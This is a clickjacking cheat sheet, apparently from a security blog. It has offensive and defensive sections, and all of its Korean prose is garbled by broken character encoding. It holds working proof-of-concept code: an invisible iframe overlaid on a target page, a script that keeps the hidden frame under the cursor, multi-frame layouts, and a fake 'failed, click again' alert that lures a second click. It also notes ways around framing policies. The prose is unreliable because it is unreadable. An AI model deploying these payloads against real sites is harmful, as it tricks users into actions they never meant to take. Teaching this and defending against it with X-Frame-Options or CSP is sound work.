Click Jacking

Click Jacking

๐Ÿ” Introduction

ClickJacking์€ frame ๋“ฑ์˜ ํ™˜๊ฒฝ์—์„œ User Interaction์„ ์œ ๋„ํ•˜์—ฌ ์‚ฌ์šฉ์ž๊ฐ€ ์ธ์ง€ํ•˜์ง€ ๋ชปํ•œ ์ƒํƒœ์—์„œ ์ค‘์š” ๊ธฐ๋Šฅ์„ ์ˆ˜ํ–‰์‹œํ‚ค๋„๋ก ํ•˜๋Š” ๊ณต๊ฒฉ ๊ธฐ๋ฒ•์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. ๊ธฐ๋ณธ์ ์œผ๋ก  ํ”ผ์‹ฑ๊ณผ ๊ฐ™์ด User Interaction์ด ํ•„์š”ํ•˜์ง€๋งŒ, Frame ๋‚ด ํฌ์ธํ‹ด, ํˆฌ๋ช… ๋ ˆ์ด์–ด ๋“ฑ CSS ๋‹จ ์ฒ˜๋ฆฌ๋กœ ์ด๋ฅผ ์‰ฝ๊ฒŒ ์ธ์ง€ํ•˜์ง€ ๋ชปํ•˜๋„๋ก ๊ตฌ์„ฑํ•˜์—ฌ ์ƒ๋Œ€์ ์œผ๋กœ ์„ฑ๊ณต ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค.

๐Ÿ—ก Offensive techniques

Detect

ClickJacking์€ frame ๊ธฐ๋ฐ˜์˜ ๊ณต๊ฒฉ์ด๊ธฐ ๋•Œ๋ฌธ์— X-Frame-Options, CSP ๋“ฑ์œผ๋กœ ๋ณดํ˜ธ๋ฐ›์ง€ ์•Š๋Š” ํŽ˜์ด์ง€๋Š” ๋ชจ๋‘ ์˜ํ–ฅ์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. ๋‹ค๋งŒ ClickJacking์—๋Š” ์ด๋ฅผ ์„ฑ๊ณตํ•˜๊ธฐ ์œ„ํ•œ ์กฐ๊ฑด๋“ค(์ค‘์š”ํ•œ ๊ธฐ๋Šฅ์ด ๋ณดํ˜ธ๋ฐ›์ง€ ๋ชปํ•˜๋Š” ๊ฒฝ์šฐ ๋“ฑ)์ด ํ•„์š”ํ•˜๊ธฐ ๋•Œ๋ฌธ์— ์•„๋ž˜ ์Šคํ…์œผ๋กœ ์ฒดํฌํ•˜๋Š” ๋ฐฉ๋ฒ•์ด ํŽธ๋ฆฌํ•ฉ๋‹ˆ๋‹ค.

1) ์„œ๋น„์Šค ๋‚ด ์ค‘์š”๊ธฐ๋Šฅ ์‹๋ณ„ 2) ํ•ด๋‹น ๊ธฐ๋Šฅ์˜ User Interaction ์ฒดํฌ 2) X-Frame-Options, CSP ๋“ฑ์œผ๋กœ ๋ณดํ˜ธ๋ฐ›์ง€ ์•Š๋Š” ํŽ˜์ด์ง€์ธ์ง€ ์ฒดํฌ

<iframe src="target_site"></iframe>

Exploitation

์ผ๋ฐ˜์ ์œผ๋กœ iframe์„ ํ†ตํ•ด PoC ์ฝ”๋“œ๋ฅผ ๊ตฌ์„ฑํ•˜๊ณค ํ•ฉ๋‹ˆ๋‹ค.

<iframe src="target_site"></iframe>

์ด ๋•Œ iframe์˜ style์—์„œ position, left, right, top, bottom, width, height ๋“ฑ์„ ์ด์šฉํ•˜์—ฌ ์›ํ•˜๋Š” ์œ„์น˜์— ๋งˆ์šฐ์Šค ํฌ์ธํŒ…์„ ๋งž์ถœ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

left:-91px;
top:-320px;
position:absolute;
filter:alpha(opacity=0);
z-index:1;
opacity:0;
overflow:hidden;
width:1485px;
height:836px;

๋‹ค๋งŒ ์ด๋ฅผ ์ง์ ‘ ๊ณ„์‚ฐํ•˜๊ธฐ์—๋Š” ์ข€ ๋ถˆํŽธํ•˜๊ธฐ ๋•Œ๋ฌธ์— ๋ณดํ†ต QuickJack ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์ด์šฉํ•˜์—ฌ ํฌ์ธํŒ…์ด ๊ตฌ์„ฑ๋œ ClickJacking PoC๋ฅผ ๋งŒ๋“ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

<style>body{margin:0px;padding:0px;}</style>
<div style="overflow:hidden;width:1px;height:1px;position:relative;" id=v>
    <iframe id="cksl7" name="cksl7" src="https://www.hahwul.com" style="border:0px;left:-108px;top:-357px;position:absolute;filter:alpha(opacity=0);z-index:1;opacity:0;overflow:hidden;width:1281px;height:604px;"></iframe>
</div>
<script>var d=document;if(!d.all)d.captureEvents(Event.MOUSEMOVE);d.onmousemove=function(e){var i=d.getElementById("v").style;i.left=d.all?event.clientX+d.body.scrollLeft:e.pageX;i.top=d.all?event.clientY+d.body.scrollTop:e.pageY;};</script>
<script src="https://code.jquery.com/jquery-2.1.3.min.js"></script>
<script>$(function(){var i=-1;$("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});$(window).focus();$(window).blur(function(){document.getElementById("v").style.visibility="hidden";});});$(window).focus()</script>

https://www.hahwul.com ๋‚ด Cullinan ๋ฒ„ํŠผ์— ํฌ์ธํŒ…ํ•œ PoC

NStep - Multiple frame

2 Step ์ด์ƒ์˜ Click Jacking์„ ์œ„ํ•ด์„  ์—ฌ๋Ÿฌ iframe๊ณผ ์ ์ ˆํ•˜๊ฒŒ ๊พธ๋ฐ€ ์ˆ˜ ์žˆ๋Š” CSS ํŠธ๋ฆญ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค. ์—ฌ๋Ÿฌ iframe์„ ๊ฐ๊ฐ step์— ๋งž๋Š” ํŽ˜์ด์ง€๋ฅผ ๋กœ๋“œํ•œ ํ›„ CSS๋กœ ์œ„์žฅํ•œ ํŽ˜์ด์ง€์—์„œ ํด๋ฆญ์„ ์œ ๋„ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค.

<style>
	.split{
		width: 50%;
		height: 100%;
	}
</style>

<iframe class="split" src="target/step1.page"></iframe>
<iframe class="split" src="target/step2.page"></iframe>

NStep - Event Handler

<script>
	function fire(){
		frm.src="target/step2.page"
		alert("์‹คํŒจํ•˜์˜€์Šต๋‹ˆ๋‹ค. ํŽ˜์ด์ง€๋ฅผ ํ•œ๋ฒˆ ๋” ๋ˆŒ๋Ÿฌ์ฃผ์„ธ์š”.")
	}
	frm.addEventListener('click', function(event) {
		fire()
	}, false);
</script>

<iframe id="frm" src="target/step1.page"></iframe>

Bypass protection

Bypass policy

X-Frame-Options, CSP ๋“ฑ์œผ๋กœ ๋ณดํ˜ธ๋ฐ›๊ณ  ์žˆ๋‹ค๊ณ  ํ•˜๋”๋ผ๋„, ์ด ํ—ค๋”๋“ค์˜ ์ •์ฑ…์— ๋”ฐ๋ผ์„œ frame ํ—ˆ์šฉ์ด ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ •์ฑ…์„ ์ž˜ ์ฒดํฌํ•˜๊ณ  ํ—ˆ์šฉ๋œ ๋„๋ฉ”์ธ ๋“ฑ์„ ํ™•์ธํ•˜์—ฌ ๊ณต๊ฒฉ ์„ฑ๊ณต์„ ์œ ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Multiple-Step ClickJacking

๊ฐ„ํ˜น User Interaction์ด ๊ณ ๋ ค๋œ ์ค‘์š” ๊ธฐ๋Šฅ๋“ค์ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋‹จ์ˆœ ํด๋ฆญ์œผ๋กœ ClickJacking์ด ์–ด๋ ค์šด ๊ฒฝ์šฐ๋„ ์กด์žฌํ•ฉ๋‹ˆ๋‹ค. ๋‹ค๋งŒ ์ดํ›„ ์•ก์…˜๋“ค์ด ์ถฉ๋ถ„ํžˆ ํด๋ฆญ, ํ…์ŠคํŠธ ์ž…๋ ฅ ๋“ฑ ์œ ๋„๊ฐ€ ๊ฐ€๋Šฅํ•œ ์ผ€์ด์Šค๋ผ๋ฉด, ClickJacking์˜ ์ฝ”๋“œ๋‹จ์—์„œ ๊ฒŒ์ž„๊ณผ ๊ฐ™์€ ํŽ˜์ด์ง€๋ฅผ ๊ตฌ์„ฑํ•˜์—ฌ ์‚ฌ์šฉ์ž์˜ ์•ก์…˜์„ ์œ ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

(์‹ค์ œ๋กœ ํ•ด์ปค์›์—์„œ ์ฃผ์‚ฌ์œ„ ๊ฒŒ์ž„ PoC๊ฐ€ ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค)

๐Ÿ›ก Defensive techniques

X-Frame-Options

X-Frame-Options์€ HTTP Response Header๋กœ iframe, frame, object ํƒœ๊ทธ๋ฅผ ์ด์šฉํ•œ ๋ Œ๋”๋ง์— ๋Œ€ํ•œ ์ •์ฑ… ํ—ค๋”์ž…๋‹ˆ๋‹ค. ์ด๋ฅผ ํ†ตํ•ด์„œ ์˜๋„ํ•˜์ง€ ์•Š์€ frame์„ ๋ง‰์„ ์ˆ˜ ์žˆ์–ด ClickJacking ๊ณต๊ฒฉ์— ํšจ๊ณผ์ ์œผ๋กœ ๋Œ€์‘ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

X-Frame-Options: deny
X-Frame-Options: sameorigin
X-Frame-Options: allow-from https://example.com/
Policy Description
deny ์–ด๋– ํ•œ ์‚ฌ์ดํŠธ์—์„œ๋„ frame ์ƒ์—์„œ ๋ณด์—ฌ์งˆ ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.
sameorigin ๋™์ผํ•œ ์‚ฌ์ดํŠธ(Same-Origin)์˜ frame์—์„œ๋งŒ ๋ณด์—ฌ์ง‘๋‹ˆ๋‹ค.
allow-from uri ์ง€์ •๋œ ํŠน์ • uri์˜ frame ์—์„œ๋งŒ ๋ณด์—ฌ์ง‘๋‹ˆ๋‹ค.

User Interaction

X-Frame-Options ํ—ค๋” ์ ์šฉ์ด ์–ด๋ ค์šด ๊ฒฝ์šฐ, ์ค‘์š” ๊ธฐ๋Šฅ์— ๋Œ€ํ•ด์„œ User Interaction์„ ์ถ”๊ฐ€ํ•˜๋Š” ํ˜•ํƒœ๋กœ ๊ณต๊ฒฉ์„ ์˜ˆ๋ฐฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹จ์ˆœ ํด๋ฆญ ๋“ฑ์„ ์ด์šฉํ•œ ํ™•์ธ์€ ์‰ฝ๊ฒŒ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๋Š” ์—ฌ์ง€๊ฐ€ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— Captcha์™€ ๊ฐ™์ด ์กฐ๊ธˆ ๋” ๊ฐ•๋„๊ฐ€ ์žˆ๋Š” User Interaction ์ ์šฉ์œผ๋กœ ํ†ตํ•ด ClickJacking์„ ๋ฐฉ์–ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

CSP

CSP(Content-Secuirty-Policy) ํ—ค๋”๋ฅผ ํ†ตํ•ด์„œ๋„ ๋ฐฉ์–ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. frame-ancestors๋ฅผ ํ†ตํ•ด frame๋ฅผ ํ—ˆ์šฉํ•  ๋ฒ”์œ„๋ฅผ ์ง€์ •ํ•˜์—ฌ ๋ฌด๋ถ„๋ณ„ํ•œ frame์„ ์ฐจ๋‹จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Content-Security-Policy: frame-ancestors 'self';
Content-Security-Policy: frame-ancestors normal-website.com;

๐Ÿ•น Tools

๐Ÿ“š Articles

  • https://www.hahwul.com/2017/07/07/web-hacking-easily-trigger-event/

๐Ÿ“Œ References